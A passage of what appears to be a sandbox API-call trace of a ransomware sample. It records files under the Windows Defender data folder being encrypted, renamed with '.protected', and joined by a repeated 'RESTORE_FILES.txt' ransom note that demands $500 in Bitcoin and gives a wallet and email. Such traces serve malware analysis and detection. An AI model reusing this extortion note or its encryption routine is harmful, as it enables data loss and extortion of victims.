lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ea24*=0x2, lpOverlapped=0x0) returned 1 [0071.671] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xfffffffe, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0071.671] WriteFile (in: hFile=0x14c, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ea24*=0x2, lpOverlapped=0x0) returned 1 [0071.672] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0071.696] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0071.733] WriteFile (in: hFile=0x14c, lpBuffer=0x4a9250*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a9250*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0071.733] CloseHandle (hObject=0x14c) returned 1 [0071.733] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\History.Log.protected") returned 89 [0071.733] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\History.Log" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\service\\history.log"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\History.Log.protected" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\service\\history.log.protected")) returned 1 [0071.733] FindNextFileW (in: hFindFile=0x4a9210, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0071.733] lstrcmpiW (lpString1="Unknown.Log", lpString2="Windows") returned -1 [0071.733] lstrcmpiW (lpString1="Unknown.Log", lpString2="Program Files") returned 1 [0071.733] lstrcmpiW (lpString1="Unknown.Log", lpString2="Program Files (x86)") returned 1 [0071.733] lstrcmpiW (lpString1="Unknown.Log", lpString2="$Recycle.bin") returned 1 [0071.733] lstrcmpiW (lpString1="Unknown.Log", lpString2="System Volume Information") returned 1 [0071.733] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\Unknown.Log") returned 79 [0071.734] StrStrIW (lpFirst="Unknown.Log", lpSrch=".protected") returned 0x0 [0071.734] lstrcmpW (lpString1="Unknown.Log", lpString2="RESTORE_FILES.txt") returned 1 [0071.734] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0071.734] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9250*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x4a9250*, pdwDataLen=0x295ea04*=0x30) returned 1 [0071.734] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\Unknown.Log" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\service\\unknown.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0071.734] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\Unknown.Log") returned 79 [0071.734] StrStrW (lpFirst="Unknown.Log", lpSrch=".txt") returned 0x0 [0071.735] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\Unknown.Log") returned 79 [0071.735] StrStrW (lpFirst="Unknown.Log", lpSrch=".rar") returned 0x0 [0071.735] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\Unknown.Log") returned 79 [0071.735] StrStrW (lpFirst="Unknown.Log", lpSrch=".zip") returned 0x0 [0071.735] ReadFile (in: hFile=0x14c, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ea24*=0x1a6e, lpOverlapped=0x0) returned 1 [0071.746] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffe592, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0071.746] WriteFile (in: hFile=0x14c, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x1a6e, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ea24*=0x1a6e, lpOverlapped=0x0) returned 1 [0071.747] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0071.747] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0071.747] WriteFile (in: hFile=0x14c, lpBuffer=0x4a9250*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a9250*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0071.747] CloseHandle (hObject=0x14c) returned 1 [0071.750] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\Unknown.Log.protected") returned 89 [0071.751] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\Unknown.Log" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\service\\unknown.log"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\Unknown.Log.protected" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\service\\unknown.log.protected")) returned 1 [0071.751] FindNextFileW (in: hFindFile=0x4a9210, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0071.751] FindClose (in: hFindFile=0x4a9210 | out: hFindFile=0x4a9210) returned 1 [0071.751] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\RESTORE_FILES.txt") returned 85 [0071.751] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\service\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0071.772] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0071.772] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0071.773] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0071.773] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0071.773] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0071.773] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0071.773] CloseHandle (hObject=0xd8) returned 1 [0071.775] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0071.775] lstrcmpiW (lpString1="Store", lpString2="Windows") returned -1 [0071.775] lstrcmpiW (lpString1="Store", lpString2="Program Files") returned 1 [0071.775] lstrcmpiW (lpString1="Store", lpString2="Program Files (x86)") returned 1 [0071.775] lstrcmpiW (lpString1="Store", lpString2="$Recycle.bin") returned 1 [0071.775] lstrcmpiW (lpString1="Store", lpString2="System Volume Information") returned -1 [0071.775] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Store") returned 65 [0071.775] lstrcmpW (lpString1="Store", lpString2=".") returned 1 [0071.775] lstrcmpW (lpString1="Store", lpString2="..") returned 1 [0071.776] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Store\\*") returned 67 [0071.776] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Store\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x4a9210 [0071.776] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0071.776] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0071.776] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0071.776] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0071.776] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0071.776] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Store\\.") returned 67 [0071.776] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.776] FindNextFileW (in: hFindFile=0x4a9210, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0071.776] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0071.776] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0071.776] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0071.776] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0071.776] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0071.776] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Store\\..") returned 68 [0071.776] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.776] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.776] FindNextFileW (in: hFindFile=0x4a9210, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0071.776] FindClose (in: hFindFile=0x4a9210 | out: hFindFile=0x4a9210) returned 1 [0071.776] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Store\\RESTORE_FILES.txt") returned 83 [0071.777] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Store\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\store\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0071.779] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0071.779] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0071.780] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0071.780] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0071.780] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0071.780] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0071.780] CloseHandle (hObject=0xd8) returned 1 [0071.780] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0071.780] FindClose (in: hFindFile=0x447cc0 | out: hFindFile=0x447cc0) returned 1 [0071.780] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\RESTORE_FILES.txt") returned 77 [0071.780] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0072.047] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0072.047] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0072.048] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0072.048] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0072.048] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0072.048] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0072.048] CloseHandle (hObject=0xd4) returned 1 [0072.048] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0072.048] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0072.048] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\RESTORE_FILES.txt") returned 69 [0072.048] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0072.049] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0072.049] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0072.049] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0072.049] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0072.050] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0072.050] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0072.050] CloseHandle (hObject=0xb4) returned 1 [0072.050] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0072.050] lstrcmpiW (lpString1="Support", lpString2="Windows") returned -1 [0072.050] lstrcmpiW (lpString1="Support", lpString2="Program Files") returned 1 [0072.050] lstrcmpiW (lpString1="Support", lpString2="Program Files (x86)") returned 1 [0072.050] lstrcmpiW (lpString1="Support", lpString2="$Recycle.bin") returned 1 [0072.050] lstrcmpiW (lpString1="Support", lpString2="System Volume Information") returned -1 [0072.050] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support") returned 53 [0072.050] lstrcmpW (lpString1="Support", lpString2=".") returned 1 [0072.050] lstrcmpW (lpString1="Support", lpString2="..") returned 1 [0072.050] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\*") returned 55 [0072.050] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x447c80 [0072.050] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0072.050] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0072.050] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0072.050] lstrcmpiW (lpString1=".", 